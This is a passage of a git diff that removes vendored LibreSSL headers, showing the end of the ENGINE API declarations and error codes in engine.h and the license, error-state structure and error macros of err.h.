-int ENGINE_set_init_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR init_f);
-int ENGINE_set_finish_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR finish_f);
-int ENGINE_set_ctrl_function(ENGINE *e, ENGINE_CTRL_FUNC_PTR ctrl_f);
-int ENGINE_set_load_privkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpriv_f);
-int ENGINE_set_load_pubkey_function(ENGINE *e, ENGINE_LOAD_KEY_PTR loadpub_f);
-int ENGINE_set_load_ssl_client_cert_function(ENGINE *e,
-    ENGINE_SSL_CLIENT_CERT_PTR loadssl_f);
-int ENGINE_set_ciphers(ENGINE *e, ENGINE_CIPHERS_PTR f);
-int ENGINE_set_digests(ENGINE *e, ENGINE_DIGESTS_PTR f);
-int ENGINE_set_pkey_meths(ENGINE *e, ENGINE_PKEY_METHS_PTR f);
-int ENGINE_set_pkey_asn1_meths(ENGINE *e, ENGINE_PKEY_ASN1_METHS_PTR f);
-int ENGINE_set_flags(ENGINE *e, int flags);
-int ENGINE_set_cmd_defns(ENGINE *e, const ENGINE_CMD_DEFN *defns);
-/* These functions allow control over any per-structure ENGINE data. */
-int ENGINE_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int ENGINE_set_ex_data(ENGINE *e, int idx, void *arg);
-void *ENGINE_get_ex_data(const ENGINE *e, int idx);
-
-/* This function cleans up anything that needs it. Eg. the ENGINE_add() function
- * automatically ensures the list cleanup function is registered to be called
- * from ENGINE_cleanup(). Similarly, all ENGINE_register_*** functions ensure
- * ENGINE_cleanup() will clean up after them. */
-void ENGINE_cleanup(void);
-
-/* These return values from within the ENGINE structure. These can be useful
- * with functional references as well as structural references - it depends
- * which you obtained. Using the result for functional purposes if you only
- * obtained a structural reference may be problematic! */
-const char *ENGINE_get_id(const ENGINE *e);
-const char *ENGINE_get_name(const ENGINE *e);
-const RSA_METHOD *ENGINE_get_RSA(const ENGINE *e);
-const DSA_METHOD *ENGINE_get_DSA(const ENGINE *e);
-const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *e);
-const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *e);
-const DH_METHOD *ENGINE_get_DH(const ENGINE *e);
-const RAND_METHOD *ENGINE_get_RAND(const ENGINE *e);
-const STORE_METHOD *ENGINE_get_STORE(const ENGINE *e);
-ENGINE_GEN_INT_FUNC_PTR ENGINE_get_destroy_function(const ENGINE *e);
-ENGINE_GEN_INT_FUNC_PTR ENGINE_get_init_function(const ENGINE *e);
-ENGINE_GEN_INT_FUNC_PTR ENGINE_get_finish_function(const ENGINE *e);
-ENGINE_CTRL_FUNC_PTR ENGINE_get_ctrl_function(const ENGINE *e);
-ENGINE_LOAD_KEY_PTR ENGINE_get_load_privkey_function(const ENGINE *e);
-ENGINE_LOAD_KEY_PTR ENGINE_get_load_pubkey_function(const ENGINE *e);
-ENGINE_SSL_CLIENT_CERT_PTR ENGINE_get_ssl_client_cert_function(const ENGINE *e);
-ENGINE_CIPHERS_PTR ENGINE_get_ciphers(const ENGINE *e);
-ENGINE_DIGESTS_PTR ENGINE_get_digests(const ENGINE *e);
-ENGINE_PKEY_METHS_PTR ENGINE_get_pkey_meths(const ENGINE *e);
-ENGINE_PKEY_ASN1_METHS_PTR ENGINE_get_pkey_asn1_meths(const ENGINE *e);
-const EVP_CIPHER *ENGINE_get_cipher(ENGINE *e, int nid);
-const EVP_MD *ENGINE_get_digest(ENGINE *e, int nid);
-const EVP_PKEY_METHOD *ENGINE_get_pkey_meth(ENGINE *e, int nid);
-const EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth(ENGINE *e, int nid);
-const EVP_PKEY_ASN1_METHOD *ENGINE_get_pkey_asn1_meth_str(ENGINE *e,
-    const char *str, int len);
-const EVP_PKEY_ASN1_METHOD *ENGINE_pkey_asn1_find_str(ENGINE **pe,
-    const char *str, int len);
-const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *e);
-int ENGINE_get_flags(const ENGINE *e);
-
-/* FUNCTIONAL functions. These functions deal with ENGINE structures
- * that have (or will) be initialised for use. Broadly speaking, the
- * structural functions are useful for iterating the list of available
- * engine types, creating new engine types, and other "list" operations.
- * These functions actually deal with ENGINEs that are to be used. As
- * such these functions can fail (if applicable) when particular
- * engines are unavailable - eg. if a hardware accelerator is not
- * attached or not functioning correctly. Each ENGINE has 2 reference
- * counts; structural and functional. Every time a functional reference
- * is obtained or released, a corresponding structural reference is
- * automatically obtained or released too. */
-
-/* Initialise a engine type for use (or up its reference count if it's
- * already in use). This will fail if the engine is not currently
- * operational and cannot initialise. */
-int ENGINE_init(ENGINE *e);
-/* Free a functional reference to a engine type. This does not require
- * a corresponding call to ENGINE_free as it also releases a structural
- * reference. */
-int ENGINE_finish(ENGINE *e);
-
-/* The following functions handle keys that are stored in some secondary
- * location, handled by the engine.  The storage may be on a card or
- * whatever. */
-EVP_PKEY *ENGINE_load_private_key(ENGINE *e, const char *key_id,
-    UI_METHOD *ui_method, void *callback_data);
-EVP_PKEY *ENGINE_load_public_key(ENGINE *e, const char *key_id,
-    UI_METHOD *ui_method, void *callback_data);
-int ENGINE_load_ssl_client_cert(ENGINE *e, SSL *s,
-    STACK_OF(X509_NAME) *ca_dn, X509 **pcert, EVP_PKEY **ppkey,
-    STACK_OF(X509) **pother,
-    UI_METHOD *ui_method, void *callback_data);
-
-/* This returns a pointer for the current ENGINE structure that
- * is (by default) performing any RSA operations. The value returned
- * is an incremented reference, so it should be free'd (ENGINE_finish)
- * before it is discarded. */
-ENGINE *ENGINE_get_default_RSA(void);
-/* Same for the other "methods" */
-ENGINE *ENGINE_get_default_DSA(void);
-ENGINE *ENGINE_get_default_ECDH(void);
-ENGINE *ENGINE_get_default_ECDSA(void);
-ENGINE *ENGINE_get_default_DH(void);
-ENGINE *ENGINE_get_default_RAND(void);
-/* These functions can be used to get a functional reference to perform
- * ciphering or digesting corresponding to "nid". */
-ENGINE *ENGINE_get_cipher_engine(int nid);
-ENGINE *ENGINE_get_digest_engine(int nid);
-ENGINE *ENGINE_get_pkey_meth_engine(int nid);
-ENGINE *ENGINE_get_pkey_asn1_meth_engine(int nid);
-
-/* This sets a new default ENGINE structure for performing RSA
- * operations. If the result is non-zero (success) then the ENGINE
- * structure will have had its reference count up'd so the caller
- * should still free their own reference 'e'. */
-int ENGINE_set_default_RSA(ENGINE *e);
-int ENGINE_set_default_string(ENGINE *e, const char *def_list);
-/* Same for the other "methods" */
-int ENGINE_set_default_DSA(ENGINE *e);
-int ENGINE_set_default_ECDH(ENGINE *e);
-int ENGINE_set_default_ECDSA(ENGINE *e);
-int ENGINE_set_default_DH(ENGINE *e);
-int ENGINE_set_default_RAND(ENGINE *e);
-int ENGINE_set_default_ciphers(ENGINE *e);
-int ENGINE_set_default_digests(ENGINE *e);
-int ENGINE_set_default_pkey_meths(ENGINE *e);
-int ENGINE_set_default_pkey_asn1_meths(ENGINE *e);
-
-/* The combination "set" - the flags are bitwise "OR"d from the
- * ENGINE_METHOD_*** defines above. As with the "ENGINE_register_complete()"
- * function, this function can result in unnecessary static linkage. If your
- * application requires only specific functionality, consider using more
- * selective functions. */
-int ENGINE_set_default(ENGINE *e, unsigned int flags);
-
-void ENGINE_add_conf_module(void);
-
-/* Deprecated functions ... */
-/* int ENGINE_clear_defaults(void); */
-
-/**************************/
-/* DYNAMIC ENGINE SUPPORT */
-/**************************/
-
-/* Binary/behaviour compatibility levels */
-#define OSSL_DYNAMIC_VERSION		(unsigned long)0x00020000
-/* Binary versions older than this are too old for us (whether we're a loader or
- * a loadee) */
-#define OSSL_DYNAMIC_OLDEST		(unsigned long)0x00020000
-
-/* When compiling an ENGINE entirely as an external shared library, loadable by
- * the "dynamic" ENGINE, these types are needed. The 'dynamic_fns' structure
- * type provides the calling application's (or library's) error functionality
- * and memory management function pointers to the loaded library. These should
- * be used/set in the loaded library code so that the loading application's
- * 'state' will be used/changed in all operations. The 'static_state' pointer
- * allows the loaded library to know if it shares the same static data as the
- * calling application (or library), and thus whether these callbacks need to be
- * set or not. */
-typedef void *(*dyn_MEM_malloc_cb)(size_t);
-typedef void *(*dyn_MEM_realloc_cb)(void *, size_t);
-typedef void (*dyn_MEM_free_cb)(void *);
-typedef struct st_dynamic_MEM_fns {
-	dyn_MEM_malloc_cb			malloc_cb;
-	dyn_MEM_realloc_cb			realloc_cb;
-	dyn_MEM_free_cb				free_cb;
-} dynamic_MEM_fns;
-/* FIXME: Perhaps the memory and locking code (crypto.h) should declare and use
- * these types so we (and any other dependant code) can simplify a bit?? */
-typedef void (*dyn_lock_locking_cb)(int, int, const char *, int);
-typedef int (*dyn_lock_add_lock_cb)(int*, int, int, const char *, int);
-typedef struct CRYPTO_dynlock_value *(*dyn_dynlock_create_cb)(
-    const char *, int);
-typedef void (*dyn_dynlock_lock_cb)(int, struct CRYPTO_dynlock_value *,
-    const char *, int);
-typedef void (*dyn_dynlock_destroy_cb)(struct CRYPTO_dynlock_value *,
-    const char *, int);
-typedef struct st_dynamic_LOCK_fns {
-	dyn_lock_locking_cb			lock_locking_cb;
-	dyn_lock_add_lock_cb			lock_add_lock_cb;
-	dyn_dynlock_create_cb			dynlock_create_cb;
-	dyn_dynlock_lock_cb			dynlock_lock_cb;
-	dyn_dynlock_destroy_cb			dynlock_destroy_cb;
-} dynamic_LOCK_fns;
-/* The top-level structure */
-typedef struct st_dynamic_fns {
-	void 					*static_state;
-	const ERR_FNS				*err_fns;
-	const CRYPTO_EX_DATA_IMPL		*ex_data_fns;
-	dynamic_MEM_fns				mem_fns;
-	dynamic_LOCK_fns			lock_fns;
-} dynamic_fns;
-
-/* The version checking function should be of this prototype. NB: The
- * ossl_version value passed in is the OSSL_DYNAMIC_VERSION of the loading code.
- * If this function returns zero, it indicates a (potential) version
- * incompatibility and the loaded library doesn't believe it can proceed.
- * Otherwise, the returned value is the (latest) version supported by the
- * loading library. The loader may still decide that the loaded code's version
- * is unsatisfactory and could veto the load. The function is expected to
- * be implemented with the symbol name "v_check", and a default implementation
- * can be fully instantiated with IMPLEMENT_DYNAMIC_CHECK_FN(). */
-typedef unsigned long (*dynamic_v_check_fn)(unsigned long ossl_version);
-#define IMPLEMENT_DYNAMIC_CHECK_FN() \
-	extern unsigned long v_check(unsigned long v); \
-	extern unsigned long v_check(unsigned long v) { \
-		if(v >= OSSL_DYNAMIC_OLDEST) return OSSL_DYNAMIC_VERSION; \
-		return 0; }
-
-/* This function is passed the ENGINE structure to initialise with its own
- * function and command settings. It should not adjust the structural or
- * functional reference counts. If this function returns zero, (a) the load will
- * be aborted, (b) the previous ENGINE state will be memcpy'd back onto the
- * structure, and (c) the shared library will be unloaded. So implementations
- * should do their own internal cleanup in failure circumstances otherwise they
- * could leak. The 'id' parameter, if non-NULL, represents the ENGINE id that
- * the loader is looking for. If this is NULL, the shared library can choose to
- * return failure or to initialise a 'default' ENGINE. If non-NULL, the shared
- * library must initialise only an ENGINE matching the passed 'id'. The function
- * is expected to be implemented with the symbol name "bind_engine". A standard
- * implementation can be instantiated with IMPLEMENT_DYNAMIC_BIND_FN(fn) where
- * the parameter 'fn' is a callback function that populates the ENGINE structure
- * and returns an int value (zero for failure). 'fn' should have prototype;
- *    [static] int fn(ENGINE *e, const char *id); */
-typedef int (*dynamic_bind_engine)(ENGINE *e, const char *id,
-    const dynamic_fns *fns);
-#define IMPLEMENT_DYNAMIC_BIND_FN(fn) \
-	extern \
-	int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns); \
-	extern \
-	int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns) { \
-		if(ENGINE_get_static_state() == fns->static_state) goto skip_cbs; \
-		if(!CRYPTO_set_mem_functions(fns->mem_fns.malloc_cb, \
-			fns->mem_fns.realloc_cb, fns->mem_fns.free_cb)) \
-			return 0; \
-		CRYPTO_set_locking_callback(fns->lock_fns.lock_locking_cb); \
-		CRYPTO_set_add_lock_callback(fns->lock_fns.lock_add_lock_cb); \
-		CRYPTO_set_dynlock_create_callback(fns->lock_fns.dynlock_create_cb); \
-		CRYPTO_set_dynlock_lock_callback(fns->lock_fns.dynlock_lock_cb); \
-		CRYPTO_set_dynlock_destroy_callback(fns->lock_fns.dynlock_destroy_cb); \
-		if(!CRYPTO_set_ex_data_implementation(fns->ex_data_fns)) \
-			return 0; \
-		if(!ERR_set_implementation(fns->err_fns)) return 0; \
-	skip_cbs: \
-		if(!fn(e,id)) return 0; \
-		return 1; }
-
-/* If the loading application (or library) and the loaded ENGINE library share
- * the same static data (eg. they're both dynamically linked to the same
- * libcrypto.so) we need a way to avoid trying to set system callbacks - this
- * would fail, and for the same reason that it's unnecessary to try. If the
- * loaded ENGINE has (or gets from through the loader) its own copy of the
- * libcrypto static data, we will need to set the callbacks. The easiest way to
- * detect this is to have a function that returns a pointer to some static data
- * and let the loading application and loaded ENGINE compare their respective
- * values. */
-					void *ENGINE_get_static_state(void);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_ENGINE_strings(void);
-
-/* Error codes for the ENGINE functions. */
-
-/* Function codes. */
-#define ENGINE_F_DYNAMIC_CTRL				 180
-#define ENGINE_F_DYNAMIC_GET_DATA_CTX			 181
-#define ENGINE_F_DYNAMIC_LOAD				 182
-#define ENGINE_F_DYNAMIC_SET_DATA_CTX			 183
-#define ENGINE_F_ENGINE_ADD				 105
-#define ENGINE_F_ENGINE_BY_ID				 106
-#define ENGINE_F_ENGINE_CMD_IS_EXECUTABLE		 170
-#define ENGINE_F_ENGINE_CTRL				 142
-#define ENGINE_F_ENGINE_CTRL_CMD			 178
-#define ENGINE_F_ENGINE_CTRL_CMD_STRING			 171
-#define ENGINE_F_ENGINE_FINISH				 107
-#define ENGINE_F_ENGINE_FREE_UTIL			 108
-#define ENGINE_F_ENGINE_GET_CIPHER			 185
-#define ENGINE_F_ENGINE_GET_DEFAULT_TYPE		 177
-#define ENGINE_F_ENGINE_GET_DIGEST			 186
-#define ENGINE_F_ENGINE_GET_NEXT			 115
-#define ENGINE_F_ENGINE_GET_PKEY_ASN1_METH		 193
-#define ENGINE_F_ENGINE_GET_PKEY_METH			 192
-#define ENGINE_F_ENGINE_GET_PREV			 116
-#define ENGINE_F_ENGINE_INIT				 119
-#define ENGINE_F_ENGINE_LIST_ADD			 120
-#define ENGINE_F_ENGINE_LIST_REMOVE			 121
-#define ENGINE_F_ENGINE_LOAD_PRIVATE_KEY		 150
-#define ENGINE_F_ENGINE_LOAD_PUBLIC_KEY			 151
-#define ENGINE_F_ENGINE_LOAD_SSL_CLIENT_CERT		 194
-#define ENGINE_F_ENGINE_NEW				 122
-#define ENGINE_F_ENGINE_REMOVE				 123
-#define ENGINE_F_ENGINE_SET_DEFAULT_STRING		 189
-#define ENGINE_F_ENGINE_SET_DEFAULT_TYPE		 126
-#define ENGINE_F_ENGINE_SET_ID				 129
-#define ENGINE_F_ENGINE_SET_NAME			 130
-#define ENGINE_F_ENGINE_TABLE_REGISTER			 184
-#define ENGINE_F_ENGINE_UNLOAD_KEY			 152
-#define ENGINE_F_ENGINE_UNLOCKED_FINISH			 191
-#define ENGINE_F_ENGINE_UP_REF				 190
-#define ENGINE_F_INT_CTRL_HELPER			 172
-#define ENGINE_F_INT_ENGINE_CONFIGURE			 188
-#define ENGINE_F_INT_ENGINE_MODULE_INIT			 187
-#define ENGINE_F_LOG_MESSAGE				 141
-
-/* Reason codes. */
-#define ENGINE_R_ALREADY_LOADED				 100
-#define ENGINE_R_ARGUMENT_IS_NOT_A_NUMBER		 133
-#define ENGINE_R_CMD_NOT_EXECUTABLE			 134
-#define ENGINE_R_COMMAND_TAKES_INPUT			 135
-#define ENGINE_R_COMMAND_TAKES_NO_INPUT			 136
-#define ENGINE_R_CONFLICTING_ENGINE_ID			 103
-#define ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED		 119
-#define ENGINE_R_DH_NOT_IMPLEMENTED			 139
-#define ENGINE_R_DSA_NOT_IMPLEMENTED			 140
-#define ENGINE_R_DSO_FAILURE				 104
-#define ENGINE_R_DSO_NOT_FOUND				 132
-#define ENGINE_R_ENGINES_SECTION_ERROR			 148
-#define ENGINE_R_ENGINE_CONFIGURATION_ERROR		 102
-#define ENGINE_R_ENGINE_IS_NOT_IN_LIST			 105
-#define ENGINE_R_ENGINE_SECTION_ERROR			 149
-#define ENGINE_R_FAILED_LOADING_PRIVATE_KEY		 128
-#define ENGINE_R_FAILED_LOADING_PUBLIC_KEY		 129
-#define ENGINE_R_FINISH_FAILED				 106
-#define ENGINE_R_GET_HANDLE_FAILED			 107
-#define ENGINE_R_ID_OR_NAME_MISSING			 108
-#define ENGINE_R_INIT_FAILED				 109
-#define ENGINE_R_INTERNAL_LIST_ERROR			 110
-#define ENGINE_R_INVALID_ARGUMENT			 143
-#define ENGINE_R_INVALID_CMD_NAME			 137
-#define ENGINE_R_INVALID_CMD_NUMBER			 138
-#define ENGINE_R_INVALID_INIT_VALUE			 151
-#define ENGINE_R_INVALID_STRING				 150
-#define ENGINE_R_NOT_INITIALISED			 117
-#define ENGINE_R_NOT_LOADED				 112
-#define ENGINE_R_NO_CONTROL_FUNCTION			 120
-#define ENGINE_R_NO_INDEX				 144
-#define ENGINE_R_NO_LOAD_FUNCTION			 125
-#define ENGINE_R_NO_REFERENCE				 130
-#define ENGINE_R_NO_SUCH_ENGINE				 116
-#define ENGINE_R_NO_UNLOAD_FUNCTION			 126
-#define ENGINE_R_PROVIDE_PARAMETERS			 113
-#define ENGINE_R_RSA_NOT_IMPLEMENTED			 141
-#define ENGINE_R_UNIMPLEMENTED_CIPHER			 146
-#define ENGINE_R_UNIMPLEMENTED_DIGEST			 147
-#define ENGINE_R_UNIMPLEMENTED_PUBLIC_KEY_METHOD	 101
-#define ENGINE_R_VERSION_INCOMPATIBILITY		 145
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/err.h b/thirdparty/libressl/include/openssl/err.h
deleted file mode 100644
index 22cdb29..0000000
--- a/thirdparty/libressl/include/openssl/err.h
+++ /dev/null
@@ -1,421 +0,0 @@
-/* $OpenBSD: err.h,v 1.25 2017/02/20 23:21:19 beck Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_ERR_H
-#define HEADER_ERR_H
-
-#include <openssl/opensslconf.h>
-
-#include <stdio.h>
-#include <stdlib.h>
-
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#ifndef OPENSSL_NO_LHASH
-#include <openssl/lhash.h>
-#endif
-
-#ifdef	__cplusplus
-extern "C" {
-#endif
-
-#ifndef OPENSSL_NO_ERR
-#define ERR_PUT_error(a,b,c,d,e)	ERR_put_error(a,b,c,d,e)
-#else
-#define ERR_PUT_error(a,b,c,d,e)	ERR_put_error(a,b,c,NULL,0)
-#endif
-
-#include <errno.h>
-
-#define ERR_TXT_MALLOCED	0x01
-#define ERR_TXT_STRING		0x02
-
-#define ERR_FLAG_MARK		0x01
-
-#define ERR_NUM_ERRORS	16
-typedef struct err_state_st {
-	CRYPTO_THREADID tid;
-	int err_flags[ERR_NUM_ERRORS];
-	unsigned long err_buffer[ERR_NUM_ERRORS];
-	char *err_data[ERR_NUM_ERRORS];
-	int err_data_flags[ERR_NUM_ERRORS];
-	const char *err_file[ERR_NUM_ERRORS];
-	int err_line[ERR_NUM_ERRORS];
-	int top, bottom;
-} ERR_STATE;
-
-/* library */
-#define ERR_LIB_NONE		1
-#define ERR_LIB_SYS		2
-#define ERR_LIB_BN		3
-#define ERR_LIB_RSA		4
-#define ERR_LIB_DH		5
-#define ERR_LIB_EVP		6
-#define ERR_LIB_BUF		7
-#define ERR_LIB_OBJ		8
-#define ERR_LIB_PEM		9
-#define ERR_LIB_DSA		10
-#define ERR_LIB_X509		11
-/* #define ERR_LIB_METH         12 */
-#define ERR_LIB_ASN1		13
-#define ERR_LIB_CONF		14
-#define ERR_LIB_CRYPTO		15
-#define ERR_LIB_EC		16
-#define ERR_LIB_SSL		20
-/* #define ERR_LIB_SSL23        21 */
-/* #define ERR_LIB_SSL2         22 */
-/* #define ERR_LIB_SSL3         23 */
-/* #define ERR_LIB_RSAREF       30 */
-/* #define ERR_LIB_PROXY        31 */
-#define ERR_LIB_BIO		32
-#define ERR_LIB_PKCS7		33
-#define ERR_LIB_X509V3		34
-#define ERR_LIB_PKCS12		35
-#define ERR_LIB_RAND		36
-#define ERR_LIB_DSO		37
-#define ERR_LIB_ENGINE		38
-#define ERR_LIB_OCSP            39
-#define ERR_LIB_UI              40
-#define ERR_LIB_COMP            41
-#define ERR_LIB_ECDSA		42
-#define ERR_LIB_ECDH		43
-#define ERR_LIB_STORE           44
-#define ERR_LIB_FIPS		45
-#define ERR_LIB_CMS		46
-#define ERR_LIB_TS		47
-#define ERR_LIB_HMAC		48
-#define ERR_LIB_JPAKE		49
-#define ERR_LIB_GOST		50
-
-#define ERR_LIB_USER		128
-
-#ifndef LIBRESSL_INTERNAL
-#define SYSerr(f,r)  ERR_PUT_error(ERR_LIB_SYS,(f),(r),__FILE__,__LINE__)
-#define BNerr(f,r)   ERR_PUT_error(ERR_LIB_BN,(f),(r),__FILE__,__LINE__)
-#define RSAerr(f,r)  ERR_PUT_error(ERR_LIB_RSA,(f),(r),__FILE__,__LINE__)
-#define DHerr(f,r)   ERR_PUT_error(ERR_LIB_DH,(f),(r),__FILE__,__LINE__)
-#define EVPerr(f,r)  ERR_PUT_error(ERR_LIB_EVP,(f),(r),__FILE__,__LINE__)
-#define BUFerr(f,r)  ERR_PUT_error(ERR_LIB_BUF,(f),(r),__FILE__,__LINE__)
-#define OBJerr(f,r)  ERR_PUT_error(ERR_LIB_OBJ,(f),(r),__FILE__,__LINE__)
-#define PEMerr(f,r)  ERR_PUT_error(ERR_LIB_PEM,(f),(r),__FILE__,__LINE__)
-#define DSAerr(f,r)  ERR_PUT_error(ERR_LIB_DSA,(f),(r),__FILE__,__LINE__)
-#define X509err(f,r) ERR_PUT_error(ERR_LIB_X509,(f),(r),__FILE__,__LINE__)
-#define ASN1err(f,r) ERR_PUT_error(ERR_LIB_ASN1,(f),(r),__FILE__,__LINE__)
-#define CONFerr(f,r) ERR_PUT_error(ERR_LIB_CONF,(f),(r),__FILE__,__LINE__)
-#define CRYPTOerr(f,r) ERR_PUT_error(ERR_LIB_CRYPTO,(f),(r),__FILE__,__LINE__)
-#define ECerr(f,r)   ERR_PUT_error(ERR_LIB_EC,(f),(r),__FILE__,__LINE__)
-#define BIOerr(f,r)  ERR_PUT_error(ERR_LIB_BIO,(f),(r),__FILE__,__LINE__)
-#define PKCS7err(f,r) ERR_PUT_error(ERR_LIB_PKCS7,(f),(r),__FILE__,__LINE__)
-#define X509V3err(f,r) ERR_PUT_error(ERR_LIB_X509V3,(f),(r),__FILE__,__LINE__)
-#define PKCS12err(f,r) ERR_PUT_error(ERR_LIB_PKCS12,(f),(r),__FILE__,__LINE__)
-#define RANDerr(f,r) ERR_PUT_error(ERR_LIB_RAND,(f),(r),__FILE__,__LINE__)
-#define DSOerr(f,r) ERR_PUT_error(ERR_LIB_DSO,(f),(r),__FILE__,__LINE__)
-#define ENGINEerr(f,r) ERR_PUT_error(ERR_LIB_ENGINE,(f),(r),__FILE__,__LINE__)
-#define OCSPerr(f,r) ERR_PUT_error(ERR_LIB_OCSP,(f),(r),__FILE__,__LINE__)
-#define UIerr(f,r) ERR_PUT_error(ERR_LIB_UI,(f),(r),__FILE__,__LINE__)
-#define COMPerr(f,r) ERR_PUT_error(ERR_LIB_COMP,(f),(r),__FILE__,__LINE__)
-#define ECDSAerr(f,r)  ERR_PUT_error(ERR_LIB_ECDSA,(f),(r),__FILE__,__LINE__)
-#define ECDHerr(f,r)  ERR_PUT_error(ERR_LIB_ECDH,(f),(r),__FILE__,__LINE__)
-#define STOREerr(f,r) ERR_PUT_error(ERR_LIB_STORE,(f),(r),__FILE__,__LINE__)
-#define FIPSerr(f,r) ERR_PUT_error(ERR_LIB_FIPS,(f),(r),__FILE__,__LINE__)
-#define CMSerr(f,r) ERR_PUT_error(ERR_LIB_CMS,(f),(r),__FILE__,__LINE__)
-#define TSerr(f,r) ERR_PUT_error(ERR_LIB_TS,(f),(r),__FILE__,__LINE__)
-#define HMACerr(f,r) ERR_PUT_error(ERR_LIB_HMAC,(f),(r),__FILE__,__LINE__)
